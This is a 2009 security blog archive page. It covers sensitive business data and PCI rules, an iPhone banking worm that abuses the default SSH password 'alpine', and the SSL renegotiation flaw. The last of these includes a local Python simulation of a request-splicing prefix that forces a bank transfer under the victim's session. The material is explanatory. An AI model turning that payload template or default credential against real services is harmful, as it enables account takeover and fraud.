Archive › November, 2009

Every Business Should Have an Information Management Plan (Part 2):

What is “Sensitive Information”?

This is the second part of a multi-part series on creating an information management plan for business clients.

Basically, any information that your client would not want posted on a public bulletin board is potentially sensitive information. Many clients will say that they do not have much sensitive data on their systems. This may be true, but there are some questions we have to ask them first.

Do you have sensitive information?

- Do you process any “keyed” credit card transactions or take any credit card information over the telephone? If so, is the card information ever written on a piece of paper? What happens to that paper after the transaction is processed? (The PCI DSS requires that such paper be destroyed, for example in a cross-cut shredder, as soon as it is no longer needed.) What controls (written policies, supervision, etc.) are in place to ensure that this happens?

- Is any credit card information kept on file, either on paper or in electronic form? The PCI DSS requires that access to such records be controlled. It also clearly states that the 3-digit security code on the back of the card (the CVV2/CVC2) MUST NOT be recorded or stored after authorization – not in a paper file and not electronically, even in encrypted form.

- Do you process payroll or keep any employee files (practically every employer does maintain employee information, even if they contract payroll to a third-party)?

- Do you maintain customer or client lists that you do not share with everyone in the business and/or with the public?

- Do you maintain financial records for clients or business partners?

- Do you maintain client or patient records that you are required by law to protect? (Examples would be PIPEDA in Canada, HIPAA for health information in the US, and GLBA for financial records in the US. Every country has laws requiring protection for certain types of records; you need to research the laws in your country.)

- Do you maintain records about ongoing projects, bids, company processes, “company secrets”, the way you do things, or other information you have developed that you would not want made public?

- Do you have internal or external correspondence or documents (emails, internal memos, etc.) that you would not want to share with everyone in your organization?

Most business clients will answer “yes” to one or more of these questions. If there are no controls in place to protect sensitive data, it should be assumed that ANYONE who wants to access that data can. All businesses have SOME controls in place – our job is to determine what controls ARE in place and what controls SHOULD be in place, based on the answers to the questions above.

Next:
Data Classification

Dennis


Dennis H in West Virginia, US

November 26, 2009


New iPhone worm can act like botnet say experts

Jail-breaking an iPhone handset invalidates the warranty says Apple.

A second worm to hit the iPhone has been unearthed by security company F-Secure.

It is specifically targeting people in the Netherlands who are using their iPhones for internet banking with Dutch online bank ING.

It redirects the bank’s customers to a lookalike site with a log-in screen.

The worm attacks “jail-broken” phones – a modification which enables the user to run non-Apple approved software on their handset.

The handsets at risk also have SSH (secure shell) installed.

Many people use SSH so other programs can remotely connect to an iPhone and, among other things, transfer files. It comes with a default password, “alpine”, which should be changed.

Only users who have installed SSH and not changed the password are at risk.

The new worm is more serious than the first because it can behave like a botnet, warns F-Secure.

This enables the phone to be accessed or controlled remotely without the permission of its owner.

Source: BBC News


More on the Latest SSL Woes, and Some Interesting Stats on Data Breaches

My apologies for the lapse in Security Corner posts. The next one will continue the series on building an Information Management Plan for clients.

There has been a lot of talk the past couple of weeks about the recently-discovered session renegotiation vulnerability in SSL. If you are interested in the details, here is a link to a .pdf of the original research. Here is a link to another article discussing the vulnerability. Mr. Google can find many more for you. This week’s episode of Security Now! will be devoted to this subject as well.

What does this mean to us and to our clients? What are the real risks? These questions are difficult to answer at this point, because not all of the details have been made public. Initial reports focused on SSL connections that employ client-side certificates, which excludes most connections. Ironically, client-side certificates are generally considered more secure; however, servers that use them commonly trigger a renegotiation (to request the certificate after the initial handshake), and renegotiation is where the flaw lies: the protocol does not bind the renegotiated handshake to the original connection, so a man-in-the-middle can splice data of his choosing in front of the victim’s encrypted request. There are more recent reports of attacks that do not involve client-side certs at all, since a server only needs to permit renegotiation, not require a certificate, to be affected.

All variants of this attack require the attacker to first establish himself as a man-in-the-middle (MITM) on the connection. This means that WIFI connections, especially on a public network, present a real risk. A wired connection on a home or office network presents little risk, as does a well-secured wireless connection, unless something on the path (the router, or a compromised host on the same LAN) has already been taken over.

There have been reports of attacks “in the wild”, and at least one successful attack against Twitter.

All browsers and all web servers are affected. There is already a patch available for OpenVPN that addresses the issue, but it will be a while before there are patches for all browsers and web servers. I will keep tabs on this and post news as it develops. In the meantime, even SSL connections are not necessarily secure on a public network.
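To make the “real risk” concrete, here is an added example (not code from the original post, and not a TLS implementation) that models the attack at the HTTP layer. All the renegotiation flaw gives a man-in-the-middle is the ability to put plaintext of his own in front of the victim’s plaintext on one connection, so that is all the code reproduces: the attacker’s request head ends with a dangling `X-Ignore:` header, the victim’s request is appended to it, and the server ends up executing the attacker’s request with the victim’s cookie. The host name, paths and session token are constructed for the example.

```python
# Added example (not from the original post): what an HTTP server sees after a
# man-in-the-middle has used the TLS renegotiation flaw to splice his own
# plaintext in front of the victim's. No TLS is simulated; on a vulnerable
# stack the renegotiated session is treated as a continuation of the same
# connection, so the application layer receives one byte stream.

from typing import Dict, Tuple

# Sent by the attacker in his own TLS session before handing the connection
# over to the victim's renegotiated handshake. The final header has no line
# terminator on purpose: the victim's request line will be glued onto it and
# become a harmless header value. Host and paths are hypothetical.
ATTACKER_PREFIX = (
    b"GET /account/transfer?to=attacker&amount=1000 HTTP/1.1\r\n"
    b"Host: bank.example\r\n"
    b"X-Ignore: "
)

# Constructed victim request, carried inside the victim's own TLS session.
VICTIM_REQUEST = (
    b"GET /account/summary HTTP/1.1\r\n"
    b"Host: bank.example\r\n"
    b"Cookie: session=victim-session-token\r\n"
    b"\r\n"
)


def server_plaintext(prefix: bytes, victim: bytes) -> bytes:
    """Byte stream the server's HTTP parser receives on a vulnerable stack."""
    return prefix + victim


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Minimal HTTP/1.1 request-head parser.

    Returns (method, request-target, headers). Header names are lower-cased;
    when a header repeats (Host does here) the first value wins, which is how
    the duplicated Host line goes unnoticed.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].decode("ascii").split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.decode("ascii").partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return method, target, headers


def simulate_attack() -> Tuple[str, str, Dict[str, str]]:
    """Run the splice and return the request the server would act on."""
    return parse_http_request(server_plaintext(ATTACKER_PREFIX, VICTIM_REQUEST))


def session_for(parsed: Tuple[str, str, Dict[str, str]]) -> str:
    """Session token the server would authorize the request under."""
    _method, _target, headers = parsed
    cookie = headers.get("cookie", "")
    _name, _, token = cookie.partition("=")
    return token


if __name__ == "__main__":
    result = simulate_attack()
    method, target, headers = result
    print(f"server executes: {method} {target}")
    print(f"authorized as:   {session_for(result)}")
    for name, value in headers.items():
        print(f"  {name}: {value}")
```

Nothing in the HTTP layer can tell the spliced request from a legitimate one, which is why the fix has to live in the TLS stack (binding the renegotiation to the original handshake, or refusing to renegotiate at all) rather than in the web application.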

Here are some interesting stats from a webinar on cloud security that I attended today:

The average “hard cost” (not including the cost of lost business or damaged reputation) of a data breach is $202 PER RECORD. The “less tangible” costs, such as loss of business, are often much higher. Remember this when advising clients about data protection, which has a cost. The cost of not protecting data can be much higher.

65% of data losses are caused by someone with privileged access (employees, contractors, etc). This includes malicious acts and errors.

40% of losses are caused by a third-party service supplier or contractor.

We focus a lot of thought and energy on hackers and outside attacks, but these are certainly not the only threats.

Dennis H in West Virginia, US

November 20, 2009


Remembrance Day – what it means to me

I come from several hundred years of Mennonite tradition as a heritage. In the years of migratory history, our basic tenets were:

  1. Exemption from military service
  2. Freedom to have our own schools

While I’m grateful and proud of our history of peace, I am even more grateful to the veterans and their families who have made our peace and prosperity possible. Without the bravery of such willing soldiers, we would not have the freedom to pursue our faith, family & fiscal responsibilities as we do today. Today we honour the brave and the fallen especially for what they’ve done.

A video worth watching by Terry Kelly is called “Pittance of Time”:
